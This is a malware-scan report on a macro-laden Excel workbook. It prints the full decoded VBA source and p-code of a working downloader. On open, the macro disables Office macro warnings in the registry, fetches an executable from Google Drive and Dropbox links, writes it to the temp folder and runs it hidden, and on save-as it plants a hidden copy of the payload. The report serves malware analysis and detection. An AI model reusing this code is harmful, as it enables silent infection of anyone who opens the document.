MALICIOUS
Risk score: 398
Heuristics: 11

- ClamAV: Xls.Downloader.Orcinius-10029360-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.Orcinius-10029360-0
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell TMP, vbHide`
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `Set myWS = CreateObject("WScript.Shell")`
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `oStream.Write WinHttpReq.ResponseBody`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set FSO = CreateObject("scripting.filesystemobject")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Private Sub Workbook_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs are referenced by macro:
  - http://www.customs.gov.cn/customs/302427/302442/tgcs/gjrhbftgcscxjxz/index.html
  - http://service.gdciq.gov.cn:8000/jyzhxx/member/攁挀椀焀⼀稀开戀戀搀开挀椀焀开栀猀开挀漀搀攀⼀椀渀搀攀砀⸀樀栀琀洀氀 (extracted as-is; the path appears mis-decoded)
  - https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
  - https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20940 bytes |

SHA-256: 0f35b4d8c70aa9c6d79e011584171b38636cfcbf1f771669e8c4ca9bbe354bf2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer
Private Sub Workbook_Open()
Dim i As Integer
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
Application.DisplayAlerts = False
SheetCount = Worksheets.Count
Call MPS
ActiveWorkbook.Sheets(1).Select
SheetsChanged = False
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
If Not SheetsChanged Then
ActiveWorkbook.Saved = True
End If
End Sub
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
SheetsChanged = True
End Sub
Private Sub Workbook_NewSheet(ByVal Sh As Object)
SheetsChanged = True
End Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
If ActiveWorkbook.Sheets.Count <> SheetCount Then
SheetsChanged = True
SheetCount = ActiveWorkbook.Sheets.Count
End If
End Sub
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Dim i As Integer
Dim AIndex As Integer
Dim FName
AIndex = ActiveWorkbook.ActiveSheet.Index
If SaveAsUI = False Then
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
ActiveWorkbook.Save
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
Else
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
FName = Application.GetSaveAsFilename(fileFilter:="Excel 莂l��ma Kitab� (*.xlsm), *.xlsm")
If FName <> False Then
ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
SaveAsInj ActiveWorkbook.Path
End If
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
End If
End Sub
Sub SaveAsInj(DIR As String)
Dim FSO As Object
Dim FN As String
Set FSO = CreateObject("scripting.filesystemobject")
FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
If FSO.FileExists(FN) Then
If Not FSO.FileExists(DIR & "\~$cache1") Then
FileCopy FN, DIR & "\~$cache1"
End If
SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
End If
End Sub
Function RegKeyRead(i_RegKey As String) As String
Dim myWS As Object
On Error Resume Next
Set myWS = CreateObject("WScript.Shell")
RegKeyRead = myWS.RegRead(i_RegKey)
End Function
Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object
On Error GoTo ErrorHandler
Set myWS = CreateObject("WScript.Shell")
myWS.RegRead i_RegKey
RegKeyExists = True
Exit Function
ErrorHandler:
RegKeyExists = False
End Function
Sub RegKeySave(i_RegKey As String, _
i_Value As String, _
Optional i_Type As String = "REG_SZ")
Dim myWS As Object
Set myWS = CreateObject("WScript.Shell")
myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub
Sub MPS()
Dim FSO As Object
Dim FP(1 To 3), TMP, URL(1 To 3) As String
Set FSO = CreateObject("scripting.filesystemobject")
FP(1) = ActiveWorkbook.Path & "\~$cache1"
FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
If FSO.FileExists(FP(1)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(1), TMP
End If
Shell TMP, vbHide
ElseIf FSO.FileExists(FP(2)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(2), TMP
End If
Shell TMP, vbHide
Else
If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
ElseIf Not FSO.FileExists(TMP) Then
If FDW((URL(1)), (TMP)) Then
ElseIf FDW((URL(2)), (TMP)) Then
ElseIf FDW((URL(3)), (TMP)) Then
End If
If FSO.FileExists(TMP) Then
Shell TMP, vbHide
End If
Else
Shell TMP, vbHide
End If
End If
End Sub
Function FDW(MYU, NMA As String) As Boolean
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
If WinHttpReq Is Nothing Then
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
End If
WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
WinHttpReq.Option(6) = AllowRedirects
WinHttpReq.Open "GET", MYU, False
WinHttpReq.Send
If (WinHttpReq.Status = 200) Then
If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
FDW = True
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile (NMA)
oStream.Close
Else
FDW = False
End If
Else
FDW = False
End If
End Function
' Processing file: /opt/analyzer/scan_staging/afe2266196024661b4d3fb333c813af2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 11862 bytes
' Line #0:
' Dim
' VarDefn SheetsChanged (As Boolean)
' Line #1:
' Dim
' VarDefn SheetCount (As Integer)
' Line #2:
' Line #3:
' FuncDefn (Private Sub Workbook_Open())
' Line #4:
' Dim
' VarDefn i (As Integer)
' Line #5:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #6:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #7:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #8:
' Line #9:
' LitStr 0x001F "HKCU\Software\Microsoft\Office\"
' Ld Application
' MemLd Version
' Concat
' LitStr 0x001B "\Excel\Security\VBAWarnings"
' Concat
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' ArgsCall RegKeySave 0x0003
' Line #10:
' LitStr 0x001F "HKCU\Software\Microsoft\Office\"
' Ld Application
' MemLd Version
' Concat
' LitStr 0x001A "\Word\Security\VBAWarnings"
' Concat
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' ArgsCall RegKeySave 0x0003
' Line #11:
' Line #12:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #13:
' Ld Worksheets
' MemLd Count
' St SheetCount
' Line #14:
' Line #15:
' ArgsCall (Call) MPS 0x0000
' Line #16:
' Line #17:
' LitDI2 0x0001
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #18:
' LitVarSpecial (False)
' St SheetsChanged
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #22:
' Ld SheetsChanged
' Not
' IfBlock
' Line #23:
' LitVarSpecial (True)
' Ld ActiveWorkbook
' MemSt Saved
' Line #24:
' EndIfBlock
' Line #25:
' EndSub
' Line #26:
' Line #27:
' FuncDefn (Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As ))
' Line #28:
' LitVarSpecial (True)
' St SheetsChanged
' Line #29:
' EndSub
' Line #30:
' Line #31:
' FuncDefn (Private Sub Workbook_NewSheet(ByVal Sh As Object))
' Line #32:
' LitVarSpecial (True)
' St SheetsChanged
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Sub Workbook_SheetActivate(ByVal Sh As Object))
' Line #36:
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' Ld SheetCount
' Ne
' IfBlock
' Line #37:
' LitVarSpecial (True)
' St SheetsChanged
' Line #38:
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' St SheetCount
' Line #39:
' EndIfBlock
' Line #40:
' EndSub
' Line #41:
' Line #42:
' FuncDefn (Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean))
' Line #43:
' Dim
' VarDefn i (As Integer)
' Line #44:
' Dim
' VarDefn AIndex (As Integer)
' Line #45:
' Dim
' VarDefn FName
' Line #46:
' Line #47:
' Ld ActiveWorkbook
' MemLd ActiveSheet
' MemLd Index
' St AIndex
' Line #48:
' Line #49:
' Ld SaveAsUI
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #50:
' LitVarSpecial (True)
' St Cancel
' Line #51:
' LitVarSpecial (False)
' Ld Application
' MemSt EnableEvents
' Line #52:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #53:
' Line #54:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' LitDI2 0x0001
' Sub
' For
' Line #55:
' Ld xlSheetHidden
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #56:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #57:
' Ld ActiveWorkbook
' ArgsMemCall Save 0x0000
' Line #58:
' Line #59:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #60:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #61:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #62:
' Ld AIndex
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #63:
' LitVarSpecial (False)
' St SheetsChanged
' Line #64:
' Line #65:
' LitVarSpecial (True)
' Ld Application
' MemSt ScreenUpdating
' Line #66:
' LitVarSpecial (True)
' Ld Application
' MemSt EnableEvents
' Line #67:
' ElseBlock
' Line #68:
' LitVarSpecial (True)
' St Cancel
' Line #69:
' LitVarSpecial (False)
' Ld Application
' MemSt EnableEvents
' Line #70:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #71:
' Line #72:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' LitDI2 0x0001
' Sub
' For
' Line #73:
' Ld xlSheetHidden
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #74:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #75:
' Line #76:
' LitStr 0x0025 "Excel 莂l��ma Kitab� (*.xlsm), *.xlsm"
' ParamNamed fileFilter
' Ld Application
' ArgsMemLd GetSaveAsFilename 0x0001
' St FName
' Line #77:
' Ld FName
' LitVarSpecial (False)
' Ne
' IfBlock
' Line #78:
' Ld FName
' ParamNamed Filename
' Ld xlOpenXMLWorkbookMacroEnabled
' ParamNamed FileFormat
' Ld ActiveWorkbook
' ArgsMemCall SaveAs 0x0002
' Line #79:
' Ld ActiveWorkbook
' MemLd Path
' ArgsCall SaveAsInj 0x0001
' Line #80:
' EndIfBlock
' Line #81:
' Line #82:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #83:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #84:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #85:
' Ld AIndex
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #86:
' LitVarSpecial (False)
' St SheetsChanged
' Line #87:
' Line #88:
' LitVarSpecial (True)
' Ld Application
' MemSt ScreenUpdating
' Line #89:
' LitVarSpecial (True)
' Ld Application
' MemSt EnableEvents
' Line #90:
' EndIfBlock
' Line #91:
' EndSub
' Line #92:
' Line #93:
' FuncDefn (Sub SaveAsInj(Dir As String))
' Line #94:
' Dim
' VarDefn FSO (As Object)
' Line #95:
' Dim
' VarDefn FN (As String)
' Line #96:
' Line #97:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set FSO
' Line #98:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' St FN
' Line #99:
' Line #100:
' Ld FN
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #101:
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #102:
' Ld FN
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' ArgsCall FileCopy 0x0002
' Line #103:
' EndIfBlock
' Line #104:
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' Paren
' Ld vbHidden
' Ld vbSystem
' Add
' ArgsCall SetAttr 0x0002
' Line #105:
' EndIfBlock
' Line #106:
' EndSub
' Line #107:
' Line #108:
' FuncDefn (Function RegKeyRead(i_RegKey As String, id_FFFE As String) As String)
' Line #109:
' Dim
' VarDefn myWS (As Object)
' Line #110:
' Line #111:
' OnError (Resume Next)
' Line #112:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #113:
' Ld i_RegKey
' Ld myWS
' ArgsMemLd RegRead 0x0001
' St RegKeyRead
' Line #114:
' EndFunc
' Line #115:
' Line #116:
' FuncDefn (Function RegKeyExists(i_RegKey As String, id_FFFE As Boolean) As Boolean)
' Line #117:
' Dim
' VarDefn myWS (As Object)
' Line #118:
' Line #119:
' OnError ErrorHandler
' Line #120:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #121:
' Ld i_RegKey
' Ld myWS
' ArgsMemCall RegRead 0x0001
' Line #122:
' LitVarSpecial (True)
' St RegKeyExists
' Line #123:
' ExitFunc
' Line #124:
' Line #125:
' Label ErrorHandler
' Line #126:
' LitVarSpecial (False)
' St RegKeyExists
' Line #127:
' EndFunc
' Line #128:
' Line #129:
' LineCont 0x0008 07 00 0F 00 0B 00 06 00
' ConstFuncExpr
' LitStr 0x0006 "REG_SZ"
' FuncDefn (Sub RegKeySave(i_RegKey As String, i_Value As String, Optional i_Type As String))
' Line #130:
' Dim
' VarDefn myWS (As Object)
' Line #131:
' Line #132:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #133:
' Ld i_RegKey
' Ld i_Value
' Ld i_Type
' Ld myWS
' ArgsMemCall RegWrite 0x0003
' Line #134:
' EndSub
' Line #135:
' Line #136:
' FuncDefn (Sub MPS())
' Line #137:
' Dim
' VarDefn FSO (As Object)
' Line #138:
' Dim
' LitDI2 0x0001
' LitDI2 0x0003
' VarDefn FP
' VarDefn TMP
' LitDI2 0x0001
' LitDI2 0x0003
' VarDefn URL (As String)
' Line #139:
' Line #140:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set FSO
' Line #141:
' Ld ActiveWorkbook
' MemLd Path
' LitStr 0x0009 "\~$cache1"
' Concat
' LitDI2 0x0001
' ArgsSt FP 0x0001
' Line #142:
' Ld ActiveWorkbook
' MemLd Path
' LitStr 0x000E "\Synaptics.exe"
' Concat
' LitDI2 0x0002
' ArgsSt FP 0x0001
' Line #143:
' Line #144:
' LitStr 0x004A "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
' LitDI2 0x0001
' ArgsSt URL 0x0001
' Line #145:
' LitStr 0x003C "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
' LitDI2 0x0002
' ArgsSt URL 0x0001
' Line #146:
' LitStr 0x003C "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
' LitDI2 0x0003
' ArgsSt URL 0x0001
' Line #147:
' LitStr 0x0004 "Temp"
' ArgsLd Environ 0x0001
' LitStr 0x000D "\~$cache1.exe"
' Concat
' St TMP
' Line #148:
' Line #149:
' LitDI2 0x0001
' ArgsLd FP 0x0001
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #150:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #151:
' LitDI2 0x0001
' ArgsLd FP 0x0001
' Ld TMP
' ArgsCall FileCopy 0x0002
' Line #152:
' EndIfBlock
' Line #153:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #154:
' LitDI2 0x0002
' ArgsLd FP 0x0001
' Ld FSO
' ArgsMemLd FileExists 0x0001
' ElseIfBlock
' Line #155:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #156:
' LitDI2 0x0002
' ArgsLd FP 0x0001
' Ld TMP
' ArgsCall FileCopy 0x0002
' Line #157:
' EndIfBlock
' Line #158:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #159:
' ElseBlock
' Line #160:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #161:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #162:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x0021 "\System32\Synaptics\Synaptics.exe"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' ElseIfBlock
' Line #163:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x0021 "\System32\Synaptics\Synaptics.exe"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #164:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' ElseIfBlock
' Line #165:
' LitDI2 0x0001
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' IfBlock
' Line #166:
' LitDI2 0x0002
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' ElseIfBlock
' Line #167:
' LitDI2 0x0003
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' ElseIfBlock
' Line #168:
' EndIfBlock
' Line #169:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #170:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #171:
' EndIfBlock
' Line #172:
' ElseBlock
' Line #173:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #174:
' EndIfBlock
' Line #175:
' Line #176:
' EndIfBlock
' Line #177:
' Line #178:
' EndSub
' Line #179:
' Line #180:
' FuncDefn (Function FDW(MYU, NMA As String, id_FFFE As Boolean) As Boolean)
' Line #181:
' SetStmt
' LitStr 0x001A "WinHttp.WinHttpRequest.5.1"
' ArgsLd CreateObject 0x0001
' Set WinHttpReq
' Line #182:
' Ld WinHttpReq
' LitNothing
' Is
' IfBlock
' Line #183:
' SetStmt
' LitStr 0x0018 "WinHttp.WinHttpRequest.5"
' ArgsLd CreateObject 0x0001
' Set WinHttpReq
' Line #184:
' EndIfBlock
' Line #185:
' Line #186:
' LitStr 0x0032 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
' LitDI2 0x0000
' Ld WinHttpReq
' ArgsMemSt Option 0x0001
' Line #187:
' Ld AllowRedirects
' LitDI2 0x0006
' Ld WinHttpReq
' ArgsMemSt Option 0x0001
' Line #188:
' LitStr 0x0003 "GET"
' Ld MYU
' LitVarSpecial (False)
' Ld WinHttpReq
' ArgsMemCall Open 0x0003
' Line #189:
' Ld WinHttpReq
' ArgsMemCall Send 0x0000
' Line #190:
' Line #191:
' Ld WinHttpReq
' MemLd Status
' LitDI2 0x00C8
' Eq
' Paren
' IfBlock
' Line #192:
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000D "404 Not Found"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000B ">Not Found<"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' And
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000F "Dropbox - Error"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' And
' IfBlock
' Line #193:
' LitVarSpecial (True)
' St FDW
' Line #194:
' SetStmt
' LitStr 0x000C "ADODB.Stream"
' ArgsLd CreateObject 0x0001
' Set oStream
' Line #195:
' Ld oStream
' ArgsMemCall Open 0x0000
' Line #196:
' LitDI2 0x0001
' Ld oStream
' MemSt Type
' Line #197:
' Ld WinHttpReq
' MemLd ResponseBody
' Ld oStream
' ArgsMemCall Xor 0x0001
' Line #198:
' Ld NMA
' Paren
' Ld oStream
' ArgsMemCall SaveToFile 0x0001
' Line #199:
' Ld oStream
' ArgsMemCall Close 0x0000
' Line #200:
' ElseBlock
' Line #201:
' LitVarSpecial (False)
' St FDW
' Line #202:
' EndIfBlock
' Line #203:
' ElseBlock
' Line #204:
' LitVarSpecial (False)
' St FDW
' Line #205:
' EndIfBlock
' Line #206:
' EndFunc
' Line #207: